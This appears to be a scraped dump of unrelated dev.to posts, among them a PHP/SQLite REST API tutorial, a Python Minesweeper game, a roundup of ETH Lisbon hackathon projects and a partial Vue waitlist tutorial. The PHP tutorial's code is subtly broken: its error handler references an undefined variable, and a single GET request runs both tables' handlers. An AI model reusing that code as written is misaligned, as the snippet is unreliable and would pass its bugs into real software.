I did THREE in October! I did some TypeScript on Virtual Coffee’s [TypeScript Tuesday Twitch Stream](https://www.twitch.tv/virtualcoffeeio). I was also a guest on Mia Moore’s stream where we talked about all things open source, and I also did a [Project Showcase stream with Appwrite](https://www.youtube.com/watch?v=PMQb5qN5ob8), where we walked through Deepgram open source projects and talked about some of the ways we try to make our repos contributor friendly.
### Blogging
Unfortunately, I haven’t been able to have the cadence I want with blogging, but I did get a couple of posts in, including this one on [Open Source Projects for Hacktoberfest]
(https://dev.to/deepgram/open-source-projects-for-hacktoberfest-2022-4cia), yesterday’s [post on imposter syndrome](https://t.co/rkob8LcmsO) and a new one on [5 Reasons to Contribute to Open Source Projects](https://blog.deepgram.com/5-reasons-to-keep-contributing-to-open-source-projects/). The good news is, our monthly challenge for Virtual Coffee is [Let’s Write 100k words together!](https://virtualcoffee.io/monthlychallenges/nov-2022), so you’ll be reading a lot more from me this month.
### Hackathon
We ran a hackathon internally with the Learn Build Teach Community. We provided support, ran a couple of workshops, and are in the judging stages. This is the first time we ran an internal community hackathon, so this was a real learning experience. As part of the post-hackathon experience, we’re doing evaluation of what worked and what didn’t, and what our strategy will be going forward.
### Twitter Spaces
I’m back on the Twitter Space game! I’m running them through the [@DeepgramAI](https://twitter.com/DeepgramAI) Twitter account. I’ve been doing them most Wednesdays at 1pm ET. So if you’re not following us, you might want to. Another option is to check out our [Events discussion](https://github.com/orgs/deepgram/discussions/categories/events) in our Community Forum where I’m posting our spaces at least a week in advance. If you have questions or comments before the space, feel free to drop them in there and we’ll talk about it on the space.
I think this is a pretty good overview of the things that I work on as a technical community builder. Oh, and one last achievement I want to share. I received one of the Twilio spotlight awards. If you want to know more about it and me, you can check out [the Business Insider article](https://www.businessinsider.com/sc/meet-the-inspirational-leaders-creating-a-better-future-for-developers?utm_campaign=devsearchlight2022_reveal&utm_source=twitter&utm_medium=twiliodevs) Being a Technical Community Builder requires a lot of pivoting, versatility, and getting outside of my comfort zone. But if I wasn’t spending time getting out of my comfort zone, then it wouldn’t be that fun, would it? | bekahhw |
1,244,285 | Data is Everything! | We live in a world where "data" is given more priority than others 🙄, and that's a fact 😎! No one... | 0 | 2022-11-05T10:32:52 | https://dev.to/aniketsingh98571/data-is-everything-1mhp | bigdata, statistic, analytics, marketing | We live in a world where "data" is given more priority than others 🙄, and that's a fact 😎! No one wanted to share about "what they are doing", "where they were last night," etc. just because of privacy reasons 😤. Isn't data privacy something that everyone should understand? 🤔 And what will happen if we lose it? "If we are connected to the internet, then we start to lose our privacy," said one of the senior developers.
The major source of income for big tech giants like Google, Amazon, Meta, etc. comes from our data alone. Curious to know how? continue reading below 🙂. Well, we have been discussing so far "data" and "data privacy", Let's decode both.
## What is data?
Data is a collection of raw, unorganized facts and details like text, observations, figures, symbols, images and descriptions of things, etc.
## What is data privacy?
Data privacy generally means the ability of a person to determine for themselves when, how, and to what extent personal information about them is shared with or communicated to others.
Do you have any idea how data was handled in the web1 world, where all of these things were not happening? Check it out.
## What is web1?
1. Web1 was introduced when the internet was born. At that time the main purpose of websites was to show static content in the form of blogs, newsletters, and articles.
2. All the websites were internally linked using hyperlinks.
Since there were no user interactions with the websites, the businesses used fewer data overall. "No user interactions" in this context refers to the inability of users to add data to websites, give reviews on items, or express their liking. In a nutshell, we may state that "data privacy was the center of the Web 1 universe. 😉"
The big picture of Data Privacy comes in the web2 world.
## What is web2?
1. Web2 was introduced in order to bring interactiveness to websites and also users can perform certain actions.
2. Big tech giants like Google, Amazon, Microsoft, etc are currently ruling the web2 world.
Social networking platforms like Instagram and Twitter and e-commerce websites like Amazon and Flipkart spring to mind when we talk about web2. Every day, these business servers receive millions of Terabytes of data uploads.
### What actual data gets uploaded to their servers 🤔 ?
1. The servers of Twitter and Instagram save your photographs, comments, likes, dislikes, messages, and a variety of other things.
2. The servers of Flipkart and amazon save your reviews, ratings, purchases, and many other things.
More than 300 million photos get uploaded per day. Every minute there are 510,000 comments posted and 293,000 statuses updated.
#### Well did I told you that they track your web activity too 🤨? How?
Assuming you've made the decision to get some sneakers from Amazon, you head there to look for them. bought it. Google now suggests some sneakers from a different brand when you start searching for anything else. This is nothing more than a few machine learning algorithms that use information from your online browsing.
#### Is data that important to a company?
Indeed, from a business standpoint, they were interested in learning things like "Are people content with our product? ", "Which product is trending on our platform? ", "reviews linked to a product? ", etc.
There are several businesses that utilize user data for marketing, financial, and healthcare analysis.
### Future of Data - Alternative data 😎!
#### What is Alternative Data?
Alternative data is defined as non-traditional data that can provide an indication of future performance of a company outside of traditional sources, such as company filings, broker forecasts, and management guidance.
Want to know more about alternative data 😄?
Check out [Proxycurl](https://nubela.co/blog/the-ultimate-guide-to-alternative-data-what-is-it-really/) now!
| aniketsingh98571 |
1,268,936 | New Product Launch "fastdbaccess" | Just Launched a new product called fastdbaccess. | 0 | 2022-11-23T14:01:15 | https://dev.to/lmas3009/new-product-launch-fastdbaccess-3hj5 | developer, mongodb, nextjs, developertools | ---
title: New Product Launch "fastdbaccess"
published: true
description: Just Launched a new product called fastdbaccess.
tags:
developer,
mongodb,
nextjs,
developertools
cover_image: https://dev-to-uploads.s3.amazonaws.com/uploads/articles/t6u5ow3rc7euawt9ekeb.gif
---

Intro Video
{% embed https://youtu.be/2cSPbRUjoPE %}
Try the product and share your feedback.
A Detailed step-by-step video coming out soon...
Get updates on https://www.producthunt.com/posts/fastdbaccess
| lmas3009 |
1,269,491 | How to Use antd upload with Form.Item and Form.List ,finally get uploaded filePath when Form onFinish? | How to Use antd upload with Form.Item and... | 0 | 2022-11-23T20:57:09 | https://dev.to/alaakassemsenousy/how-to-use-antd-upload-with-formitem-and-formlist-finally-get-uploaded-filepath-when-form-onfinish-48i0 | {% stackoverflow 74547021 %} | alaakassemsenousy | |
1,269,775 | REST API with PHP and SQLite // Case Study Android Note App | Hola! Dalam tutorial kali ini, kita akan membuat Database yang dapat dihubungkan dengan... | 0 | 2022-11-24T12:21:13 | https://dev.to/ayatullahmaarif/rest-api-with-php-and-sqlite-case-study-android-note-app-3emp | rest, php, sqlite, android |
## Hola!
Dalam tutorial kali ini, kita akan membuat Database yang dapat dihubungkan dengan project Android Studio. Studi kasus saya kali ini adalah aplikasi note.
## PHP
Langkah pertama adalah pembuatan folder project, folder tersebut harus diletakkan di htdocs xampp `C:\xampp\htdocs` folder saya kali ini saya namai NOTEmplate. Lalu buatlah file php, disini saya namai dengan index.php
Di file index.php, buatlah variabel untuk menginisiasi nama file database, lalu dengan PDO kita dapat mengeksekusi pembuatan file database tersebut. Untuk evaluasi error kita dapat menggunakan try & catch, didalam try kita juga akan sekalian menginisiasi pembuatan tabel dengan bahasa SQLite dan PHP
```php
$file_db = "notemplate.db";
try{
$pdo = new PDO("sqlite:$file_db");
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->setAttribute(PDO::ATTR_EMULATE_PREPARES, false);
//tabel akun
$sql_create = "CREATE TABLE IF NOT EXISTS 'akun'(
'id_akun' INTEGER NOT NULL PRIMARY KEY AUTOINCREMENT,
'username' TEXT NOT NULL,
'password' TEXT NOT NULL)";
$pdo->exec($sql_create);
//tabel konten
$sql_create = "CREATE TABLE IF NOT EXISTS 'konten'(
'id_konten' INTEGER NOT NULL PRIMARY KEY AUTOINCREMENT,
'judul' TEXT NOT NULL,
'konten' TEXT NOT NULL,
'created_at' DATETIME NOT NULL DEFAULT CURRENT_TIMESTAMP)";
$pdo->exec($sql_create);
}
catch(Throwable $th){
throw new PDOException($e->getMessage(),(int)$e->getCode());
}
```
Disini saya membuat 2 tabel, tabel akun dan konten. Tiap tabel akan membutuhkan method agar dapat beroperasi.
**Method** yang saya buat disini adalah :
`GET` untuk mendapatkan data dari server
`POST` untuk menginput data baru
`DELETE` untuk menghapus data
**Additional** : Apabila yang berhubungan dengan aplikasi adalah mesin maka harus ditambahkan `header('Content-Type: application/json');` Secara default aplikasi menggunakan json, namun apabila yang berhubungan adalah manusia, maka dapat dilewati.
```php
//mehtod tabel akun
if($_SERVER['REQUEST_METHOD'] === 'GET'){
$query = 'SELECT * FROM akun ORDER BY id_akun ASC';
$stmt = $pdo->prepare($query);
$stmt->execute();
$data = $stmt->fetchAll(PDO::FETCH_ASSOC);
echo json_encode($data);
}
else if($_SERVER['REQUEST_METHOD'] === 'POST'){
if($_POST['username']!="" && $_POST['password']!="" ){
$username = $_POST['username'];
$password = $_POST['password'];
$query = "INSERT INTO akun (username, password) VALUES (?,?)";
$stmt = $pdo->prepare($query);
$res = $stmt->execute([$username, $password]);
if($res){
$data = ['username'=>$username, 'password'=>$password];
echo json_encode($data);
}else{
echo json_encode(['error'=>$stmt->errorCode()]);
}
}
}
else if($_SERVER['REQUEST_METHOD'] === 'DELETE'){
if($_GET['id_akun'] != ''){
$id_akun = $_GET['id_akun'];
$query = "DELETE FROM akun WHERE id_akun = ?";
$stmt = $pdo->prepare($query);
$res = $stmt->execute([$id_akun]);
if($res){
$data = ['id_akun'=>$id_akun];
echo json_encode($data);
}else{
echo json_encode(['error'=>$stmt->errorCode()]);
}
}
}
// Method tabel konten
if($_SERVER['REQUEST_METHOD'] === 'GET'){
$query = 'SELECT * FROM konten ORDER BY created_at DESC';
$stmt = $pdo->prepare($query);
$stmt->execute();
$data = $stmt->fetchAll(PDO::FETCH_ASSOC);
echo json_encode($data);
}
else if($_SERVER['REQUEST_METHOD'] === 'POST'){
if($_POST['konten']!="" && $_POST['konten']!="" ){
$judul = $_POST['judul'];
$konten = $_POST['konten'];
$query = "INSERT INTO konten (judul, konten) VALUES (?,?)";
$stmt = $pdo->prepare($query);
$res = $stmt->execute([$judul, $konten]);
if($res){
$data = ['jodul'=>$judul, 'konten'=>$konten];
echo json_encode($data);
}else{
echo json_encode(['error'=>$stmt->errorCode()]);
}
}
}
else if($_SERVER['REQUEST_METHOD'] === 'DELETE'){
if($_GET['id_konten'] != ''){
$id_konten = $_GET['id_konten'];
$query = "DELETE FROM konten WHERE id_konten = ?";
$stmt = $pdo->prepare($query);
$res = $stmt->execute([$id_konten]);
if($res){
$data = ['id_konten'=>$id_konten];
echo json_encode($data);
}else{
echo json_encode(['error'=>$stmt->errorCode()]);
}
}
}
```
## POSTMAN
Untuk mengoperasikan method method diatas kita tidak bisa menggunakan browser biasa, kita perlu menggunakan aplikasi khusus yaitu **Postman** . Sebelum kita masuk ke postman, kita aktifkan dulu apache di dalam Xampp.

Buka postman, dan buat tab baru. Dalam url kita isikan `localhost/(folder dalam htdocs)/(nama folder php)/` itu untuk default, jika anda memodifikasi port, maka masukkan juga portnya. `localhost:(port)/.../...` untuk url saya disini `localhost/NOTEmplate/index.php`.
**GET** => pilih GET di sebelah kiri url, lalu send.

Bisa dilihat dibagian bawah, output menghasilkan 2 bracket kosong, untuk dua tabel.
File database seharusnya terbuat setelah anda menekan send, file dapat dilihat di folder htdocs, penamaannya juga seharusnya sesuai dengan inisiasi variabel file_db di index.php yang sudah kita buat.

**POST** => pilih POST di sebelah kiri url, lalu kita harus mengisikan kolom dan valuenya terlebih dahulu, caranya dengan memilih Body(ada dibawah url) lalu form-data(ada dibawah body).

Bisa dilihat dibagian bawah, hasil nya sudah masuk. Kita bisa melihat seluruh isi tabel dengan get.

Jika anda ingin mengisikan salah satu tabel saja, sebenarnya bisa, tetapi akan ada warning, namun itu tidak masalah data akan tetap masuk.


**DELETE** => pilih DELETE di sebelah kiri url, lalu kita harus mengisikan id dari data yang akan di hapus, caranya dengan memilih Params(ada dibawah url). Isikan nama id dari tabel mana yang akan dihapus, disini saya akan menghapus dari tabel konten, lalu isikan id dari data mana yang akan dihapus, disini saya akan menghapus konten dengan id 2.

Akan ada warning, karena kita tidak mengisikan kolom id_akun, namun tidak masalah. Data akan tetap terhapus. Jika ingin melihat data yang tersisa bisa menggunakan method get.

Anda juga dapat mengecek menggunakan sqliteonline.com, dengan cara upload file database(yang ada di folder htdocs xampp), gunakan command `SELECT `untuk melihat data.

## THANKS
Terima kasih atas perhatiannya, feel free to ask on comment. Good luck ☺;
| ayatullahmaarif |
1,269,816 | Link Analyzer Tool - Website Link checker | You can track all Do-Follow, No-Follow, internal and external links on your website, on a particular... | 0 | 2022-11-24T03:19:19 | https://dev.to/mya2zseo/link-analyzer-tool-website-link-checker-9oo | <p>You can track all Do-Follow, No-Follow, internal and external links on your website, on a particular page with the help of our “Link Analyzer Tool”.</p>
<h3>Link Analyzer Tool</h3>
<p>You should analyze links on your website, it can help you to reduce spam score. Link Analyzer Tool by mya2zseo.com is made to show you the authentic result.</p>
<p>If you are preparing your website for the latest penguin update of Google search algorithm, or you are conducting a casual audit, our free link checker SEO tool can meet all your requirements. This utility tool effortlessly analyzes and reviews your website links.</p>
<p><img alt="Analyze website links" class="responsivejpg" src="https://mya2zseo.com/uploads/link-analyzer.jpg" style="width: 854px; height: 387px;" />You can check one link or URL or webpage at a time with our link tester tool. If you try to audit deeply, you can check all the links one by one, including the home page.</p>
[Read More ->](https://mya2zseo.com/link-analyzer-tool) | mya2zseo | |
1,270,025 | Python Terminal Game: Minesweeper | As a part of the codecademy course on Computer Science I came up with this approach to code the game... | 0 | 2022-11-24T04:31:36 | https://dev.to/ftapiaa27/python-terminal-game-minesweeper-4bn8 | python, computerscience, gamedev, beginners | As a part of the codecademy course on Computer Science I came up with this approach to code the game "Minesweeper" as a game interactible through the terminal.
## The Game class
`class Game:
alive = 1
board_back = [[" " for i in range(9)] for j in range(9)]
board_front = [["#" for i in range(9)] for j in range(9)]
bomb_coor = []
def __init__(self):
x_coor = [0,0,1,1,2,2,3,3,4,4,5,5,6,6,7,7,8,8]
y_coor = [0,0,1,1,2,2,3,3,4,4,5,5,6,6,7,7,8,8]
for i in range(10):
temp = []
temp.append(x_coor.pop(random.choice(x_coor)))
temp.append(y_coor.pop(random.choice(y_coor)))
self.bomb_coor.append(temp)
self.board_back[temp[0]][temp[1]] = "B"
for i in range(9):
for j in range(9):
if self.board_back[i][j] == "B":
continue
else:
self.board_back[i][j] = str(self.count_bombs(i, j))
def count_bombs(self, x, y):
count = 0
for i in range(x-1,x+2):
for j in range(y-1,y+2):
if i == x and j == y:
continue
elif i < 0 or i > 8 or j < 0 or j > 8:
continue
elif self.board_back[i][j] == "B":
count += 1
else:
continue
return count
def print_board(self, board):
for i in range(9):
print(board[i])
def set_flag(self):
x = int(input("Type horizontal coordinate to flag: "))
y = int(input("Type vertical coordinate to flag: "))
self.board_front[y][x] = "F"
def uncover(self):
x = int(input("Type horizontal coordinate to uncover: "))
y = int(input("Type vertical coordinate to uncover: "))
if self.board_back[y][x] == "0":
self.clear_empty(y, x)
else:
self.board_front[y][x] = self.board_back[y][x]
if self.board_back[y][x] == "B":
print("You lost")
self.alive = 0
def clear_empty(self, x, y):
if self.board_front[x][y] != " " and self.board_back[x][y] == "0":
self.board_front[x][y] = " "
for i in range(y-1, y+2, 2):
if i < 0 or i > 8:
continue
self.clear_empty(x, i)
for j in range(x-1, x+ 2, 2):
if j < 0 or j > 8:
continue
self.clear_empty(j, y)
def verify_game(self):
if self.alive == 0:
print("Game Over")
return 0
else:
user_wins = True
for i in self.bomb_coor:
if self.board_front[i[0]][i[1]] != "F":
user_wins = False
break
for i in self.board_front:
if "#" in i:
user_wins = False
break
if user_wins:
print("You Won!")
return 0
else:
return 1`
This class contains 4 attributes and 7 methods
THE ATTRIBUTES
1. alive: This value indicates whether the player is alive or dead
2. board_back: this isn't visible to the player, it is a 8x8 matrix (list of 8 lists of 8 values) or board containig all the info of the board including bomb locations and the number of bombs in surrounding squares.
3. board_front: this is visible to the player, "#" means the squared hasn't been uncovered.
4. bomb_coor: a list of pair values indicating the coordinates of all bombs
THE METHODS
1. __init__: the constructor of the class defines the bomb_coor array and sets up the board_back matrix.
2. count_bombs: this method is used in the constructor to count the number of bumbs surrounding a certain square assuming it doesn't have a bomb itself.
3. print_board: prints a board in the terminal.
4. set_flag: used to "flag" a certain square when we believe it to have a bomb in board_front.
5. uncover: used to uncover a obscured square in board_front and reveal its corresponding value in board_back.
6. clear_empty: used to clear all empty contiguous squares in board_front that correspond to a "0" in board_back.
7. verify_game: used to check if the game is still going or if it has ended in a Win or a Loss
Example of object usage:
`game = Game()
while game.alive:
game.print_board(game.board_back)
print()
game.print_board(game.board_front)
if game.verify_game() == 0:
break
choice = int(input("""
Select one optione:
1.- Flag
2.- Uncover
"""))
if choice == 1:
game.set_flag()
else:
game.uncover()`
Code on github: https://github.com/ftapiaa27/MineSweeper.git
CONCLUSION:
This little project serves as a general practice of OOP in python, it's not much but it's hones work | ftapiaa27 |
1,270,047 | Challenges on Day 1 | On the very fist day when I first started coding, I faced lots of difficulties al though I'm from a... | 0 | 2022-11-24T05:56:48 | https://dev.to/kunalsamanta/challenges-on-day-1-o0a | On the very fist day when I first started coding, I faced lots of difficulties al though I'm from a Computer science background. I started coding after getting my degree from college. Whenever I opened my laptop and started to code, I couldn't understand what was going on. Then after receveing some inputs from my friends and reseaeching on the internet, I couldn't understand the end result for that particular problem statement but was unable to conceptulize the solution, and that led me to leaving those problems in-between and never returning back to it. Even if i was able to get few things correct the constant nudge of warning and error unmotivated me quite often. | kunalsamanta | |
1,270,477 | The best projects from ETH Lisbon 2022 | One of the best ETH events in 2022, ETH Lisbon, took place from the 28th to the 30th of October. This... | 0 | 2022-11-24T11:45:41 | https://dev.to/taikai/the-best-projects-from-eth-lisbon-2022-16c3 | eth, ethlisbon, hackathon, developers | One of the best ETH events in 2022, ETH Lisbon, took place from the 28th to the 30th of October. This Ethereum-focused hackathon had over 330 participants and 97 projects delivered using TAIKAI’s hackathon platform.
This large number of developers did not happen by chance. In addition to the ability to create innovative projects, the total prize was $20,000, with the best 10 projects earning 2,000$ each.
There were also sponsor bounties worth up to $118,500!
In order to compete for these prizes, participants teamed up using TAIKAI’s matchmaking system, resulting in 97 projects delivered that were evaluated by 13 juries.
We’ve analyzed the projects and compiled a list of the best ones, divided by categories.

## The best DAO and DeFi projects from ETH Lisbon
### [Lekker Finance](https://taikai.network/ethlisbon/hackathons/ethlisbon-2022/projects/cl9tpj350446301zcoiepyje5/idea)
Before we get into the details of this project, which was named one of the top ten hackathon projects at ETH Lisbon, it's important to understand that it uses the Euler Protocol, an Ethereum-based non-custodial DeFi (Decentralized Finance) protocol that allows users to lend and borrow almost any crypto asset.
This is important to understand because the Lekker Finance project's goal is to allow users to enter leveraged positions via Euler.
The hackathon system works as follows: positions can be opened in a single transaction using flash swaps, making the process easier for the end user. It's no coincidence that the project’s slogan is Leverage Made Simple.
Typically, in order to obtain leverage, users must execute multiple loan-swap-loan transactions, resulting in a complex manual process and high fees.
Also, this makes loans and investments more difficult to trace and exit.

With Lekker Finance, interest rates are reduced by simplifying the process on a single transaction, as opposed to what happens in centralized exchanges, for example.
### [GlacierDAO](https://taikai.network/ethlisbon/hackathons/ethlisbon-2022/projects/cl9uk7sb335995101tp0k0duqhn/idea)
Elected as one of the Top 10 hackathon projects of ETH Lisbon, GlacierDAO has proposed a Decentralized Autonomous Organization that preserves open-source code as a public good.
The project's authors argue that code, like data, should be preserved in a censorship-resistant manner.
The concept arose after some developers complained that their GitHub accounts had been suspended for writing tornado cash codes.
To clarify, tornado cash works as a token mixer, used to shuffle transactions in a way that makes tracking difficult in public blockchains like Ethereum.
To ensure the preservation of open source, GlacierDAO conducts a call for funds every quarter. Individuals donate funds to cover the costs of preserving codes in exchange for NFTs.

On the other hand, a call for URLs is issued at the same time, which means that individuals can submit URLs to code repositories that they believe are valuable.
URLs are placed on a list for those who contributed funds to vote on whether the code should be preserved.
The funds raised will then be used to ensure the code's preservation on the FileCoin Network, an open-source peer-to-peer network that stores files, protocols, and incentive layers. In other words, users pay storage providers to store their files and this payment is made through investors in the GlacierDAO strategy.
### [BibliothecaDAO - Realms Assassins](https://taikai.network/ethlisbon/hackathons/ethlisbon-2022/projects/cl9ubhjnm5143601tau5fipokn/idea)
Bibliotheca DAO is a web3 game development studio that creates on-chain games for StarkNet, a permissionless decentralized Validity-Rollup (also known as a "ZK-Rollup").
A team from Bibliotheca DAO developed a solution on ETH Lisbon to hide one player's information and expose it only when other players meet on-chain conditions.
They accomplished this through the use of a trusted 'dungeon master' (third party) who stores private information to enable multiplayer on-chain games, achieving an on-chain without the ZK hashing construction.
To get it done, they used the game Realms Assassins – Fog of War as an example. The project was also one of the 10 hackathon winners presented on ETH Lisbon.
##The best crypto wallet projects
###[Archive the Web](https://taikai.network/ethlisbon/hackathons/ethlisbon-2022/projects/cl9v5bl03100766701ttowv62zoz/idea)
This project was also named one of the hackathon's top ten projects and won first place in the Wallet Connect best public good bounty.
The idea was to create an automatic website archiving system based on web3 protocols that could be paid for with a variety of crypto assets, acting as a decentralized backup of the world wide web.
The "Archive the Web" system enables users to automate website archiving on the Arweave decentralized protocol at predetermined intervals (for example, every 60 minutes) for an approximate duration (for example, 365 days) and pay for data storage with ETH, ERC-20, or AR.
It means that users can permanently and automatically save information, apps, and other content (such as images or web apps), preventing data published on the internet from being lost, as happens in many cases every day.

To achieve this, the Archive the Web team created a custom Metamask and a WalletConnect button that allows direct interaction with Arweave and uses the arp Ethereum signer to interact with Smartweave contracts via ETH/ERC20 wallets.
### [WalletConnect meets Self-Sovereign Identity](https://taikai.network/ethlisbon/hackathons/ethlisbon-2022/projects/cl9v7ejkf118071801ttd82tmgx3/idea)
Winner of the Wallet Connect Best Mobile UX bounty, this project extends the WalletConnect V2 protocol stack to enable Self-Sovereign Identity (SSI), exchanging Decentralized Identifiers and W3C Verifiable Credentials in a secure, privacy-respecting, and user-friendly manner.
But don’t take our word for it.
### [Testamint](https://taikai.network/ethlisbon/hackathons/ethlisbon-2022/projects/cl9tzyn7h29729001z2ukofazna/idea)
Testamint, one of the zkSync bounty winners, is a social recovery mobile dApp project that uses zkSync account abstraction to allow account recovery by a group of trusted people after a predetermined interval of inactivity.
It specifically addresses three issues: lost keys, lost passphrases, and death. Yes, that's right: if a cryptocurrency holder passes away, family members can recover it using this dApp.
The solution connects wallets through Wallet Connect and allows users to create a list of family members, set up periodic reminders to prove the user is still alive, and record a video testimonial that will be delivered to family members if the user fails to prove he or she is still alive.
Furthermore, the solution provides the user with the "still here" button to complete a transaction and prove the user is still alive.
## The best dApps and smart contract projects
### [Smart What?!](https://taikai.network/ethlisbon/hackathons/ethlisbon-2022/projects/cl9slqpm144092101zc25lw0c5j/idea)
During ETH Lisbon, this project, which promised to be a Google Translator for Smart Contracts, was rewarded in the Wallet Connect - Best Mobile UX bounty category.
The idea was to help web2 users understand smart contracts better by "translating" smart contract contents. The goal is to make smart contracts and the web3 world more accessible by providing a thorough understanding of the content.
The mechanism is quite straightforward. Users only need to paste a smart contract URL to get a full translation that anyone with web2 code/math knowledge can understand.
Then, it is possible to save these translations or use Wallet Connect to upload them on Filecoins IPFS.
This tool can also be used by auditing firms to review smart contracts. It saves time and allows less experienced team members to get an audit started.
You can test it right now by entering the URL of your smart contract on the Smart What website.

### [SafeCheck](https://taikai.network/ethlisbon/hackathons/ethlisbon-2022/projects/cl9solpi758359001z2qgxiqtrl/idea)
This fantastic tool was one of the top ten winners of the ETH Lisbon hackathon. The team's concept was to design a solution that could provide users with information about the outcome of transactions and the addresses they are interacting with, before sending transactions.
In other words, users can analyze smart contract data and transactions before signing them.
SafeCheck can be added as an extension to MetaMask accounts or used directly on the web app by entering a smart contract number and letting SafeCheck inspect it. Additionally, transaction calls can be simulated directly from the web app.
Here's a sample of the SafeCheck web app interface:

And here is how it works when connected with MetaMask:

### [Trust score snap](https://taikai.network/ethlisbon/hackathons/ethlisbon-2022/projects/cl9u0bpxr31220901vt9704zkbr/idea)
This intriguing project was chosen as one of the top ten projects from the ETH Lisbon hackathon. The idea is to show color flags that indicate how safe it is to interact with specific smart contracts: green (safe to use), orange (warning), and red (dangerous).
It acts as a MetaMask Snap extension that reads and categorizes smart contracts based on a security suspicion standard determined by Trust Score.
The project's authors intended to provide users with non-technical information using a simple way to determine whether a smart contract is safe to interact with.
The system automatically analyzes quantitative and qualitative data about a smart contract, such as its popularity (how many people have interacted with it), time of existence (contract age/antiquity), frequency (recent number of interactions), repetition (how many times each user has interacted with the contract), and so on.
Here’s an example analysis:

## Honorable Mentions
Overall, the ETH Lisbon hackathon had some pretty amazing projects!
Curating this list was a tough task too. In total, 97 incredible projects were delivered but it would be too much information to include them all here.
However, to provide a better overview of the event, we compiled a list of "honorable mentions", which is comprised of a handful of projects that caught our attention.

### [Zilly](https://taikai.network/ethlisbon/hackathons/ethlisbon-2022/projects/cl9tzophr28518901vtvuvcqrt6/idea)
This creative idea was rewarded as one of ETH Lisbon's best projects. The Zully project proposes an embeddable widget for developing Web3 membership programs that increase brand engagement and loyalty.
The project's concept is based on users receiving a membership card and accumulating loyalty points by completing on-chain and off-chain quests.
In exchange, they receive a customizable NFT membership, granting users social status and increasing their sense of belonging to a brand community.
There is a utility shop on the widget where users can spend points to get perks and exclusive benefits.

### [Multi Resolver Snap](https://taikai.network/ethlisbon/hackathons/ethlisbon-2022/projects/cl9v6ct2h110026501talhki7i6s/idea)
The Multi Resolver Snap project provides a solution for creating a friendlier web3 environment for both users and developers.
The author's idea was to create a snap on MataMask that allows users to send cryptocurrency in a more straightforward manner. It is possible to send crypto to anything using Multi Resolver, such as Twitter names, emails, phone numbers. In other words, this snap enables users to convert any object to an address and send value transactions.
According to the author of the project: “This multi-resolver MetaMask Snap enables dApps to send transactions to string-type handles that can take on a multitude of origins.
Instead of integrating multiple domain services and resolvers individually, dApps can now simply call this snap and let MetaMask do the rest”.

### [Authsome](https://taikai.network/ethlisbon/hackathons/ethlisbon-2022/projects/cl9tv1epm14319401w1mf7ltuhm/idea)
This project won the Fuel Labs bounty at ETH Lisbon. Authsome creates a multi-signature wallet with the Fuel Virtual Machine (FuelVM) predicate system and the Sway programming language (Fuel's own domain-specific language).
This multi-signature wallet is then used to power a pluggable authentication infrastructure, much like Web3Auth works.

Here’s how it works:
The user logs in to Athsome using their Fuel email and password. Then, Authsome generates three keys automatically: one is password-encrypted and sent to the backend service; another is stored in the browser's local storage; the third is saved in a file for manual recovery. Following that, the user can make payments.
For the ones who do not know Fuel, it is a fast execution layer for modular blockchains, and FuelVM is one of the central technology pillars, designed to reduce wasteful processing in traditional blockchain virtual machine architectures.
## Final Thoughts

ETH Lisbon hackathon was incredibly fun, exciting and competitive. These challenges provide a space for developers, innovators and enthusiasts to brainstorm ideas and develop projects that help the web3 space grow.
This hackathon was also an excellent validation that hackathons are here to stay. We learned a lot from these projects and shared a glimpse of the obstacles, iterations and opportunities available right now.
Now it's up to you! Browse our hackathons page and start building today.
## Host hackathons at TAIKAI
TAIKAI's hackathon platform is the perfect place to host your web3 hackathon.
No matter if the hackathon is online or hybrid, we can help you drive innovation and engagement.
Here's a glimpse of what our platform offers:
- Simple communication among all parties involved: organizers, participants, and mentors;
- Logical and user-friendly hackathon page for organizing and presenting content, rules, prizes, timeline, and updates;
- Matchmaking system: Allow participants to team up and form groups based on each one's abilities;
- Submission projects: Enable rich formats in project submissions including images, videos, and attachments;
- Live streaming: Broadcast content, such as lectures and workshops;
- Transparent voting system: Tokens are used to evaluate projects, ensuring transparency and equal opportunities.
### Request a demo today and take your hackathon to the next level. | carlosmendes |
1,270,883 | Build a Waitlisting Application in Vue using Xata and Cloudinary | For many reasons, businesses start their introduction to the market by launching a waitlist.... | 0 | 2022-11-24T15:55:37 | https://dev.to/hackmamba/build-a-waitlisting-application-in-vue-using-xata-and-cloudinary-1anf | vue, xata, cloudinary, javascript | For many reasons, businesses start their introduction to the market by launching a waitlist. Universities and medical institutions are known for having waitlists for admissions and surgeries, respectively.
This article will discuss building a waitlisting application in Vue using Cloudinary and Xata.
[Cloudinary](https://cloudinary.com/signup?utm_source=hackmamba&utm_campaign=hackmamba-hackathon&utm_medium=hackmamba-blog) is a cloud-based video and image management platform that offers services for managing and transforming uploaded assets for usage on the web.
Xata is a [Serverless Data platform](https://xata.io/docs/intro/serverless-data-platform?utm_source=hackmamba&utm_campaign=hackmamba-hackathon&utm_medium=hackmamba-blog) that simplifies how developers work with data by providing the power of a traditional database with the usability of a SaaS spreadsheet app.
## GitHub
Check out the complete source code [here](https://github.com/MoeRayo/xata-cloudinary-waitlist).
## Netlify
We can access the live demo [here](https://phenomenal-sunburst-10b96a.netlify.app).
## Prerequisite
Understanding this article requires the following:
- Installation of Node.js
- Basic knowledge of JavaScript
- A Cloudinary account (sign up [here](https://cloudinary.com/signup?utm_source=hackmamba&utm_campaign=hackmamba-hackathon&utm_medium=hackmamba-blog))
- Creating a free account with [Xata](https://xata.io?utm_source=hackmamba&utm_campaign=hackmamba-hackathon&utm_medium=hackmamba-blog)
## Creating a Vue app
Using the `vue create <project-name>` command, we will create a new Vue app.
The process of scaffolding the project would provide a list of options, which could look like this:

We can start our Vue application by running the following command:
```javascript
cd <project name>
npm run serve
```
Vue will, in turn, start a hot-reloading development environment accessible by default at `http://localhost:8080`.
## Styling
The CSS framework to be used in this project is [Tachyons CSS](https://tachyons.io/). Install it by running the command below in the terminal.
```javascript
npm i tachyons
```
Afterward, make it globally available for usage in the project by adding the line below in our `src/main.js`:
```javascript
import 'tachyons/css/tachyons.css';
```
## Creating a Xata Database
To create a database on Xata, we must either log into our account or create a new [account](https://xata.io?utm_source=hackmamba&utm_campaign=hackmamba-hackathon&utm_medium=hackmamba-blog). Next, we will go to the user dashboard's database tab to create an appropriate database.

We will create a new table within the database and add the appropriate records/fields that we want the table to have. In the case of the solution we are building, we will create a `signups` table with three fields: `firstname`, `lastname`, and `email`.
These fields signify the data we will track in our application before saving it to the database.

## Setting up Xata in our Vue application
### Installing Xata CLI
We will first need to install Xata CLI on our machine. To do this, we will open the command line terminal as an administrator and run the command below.
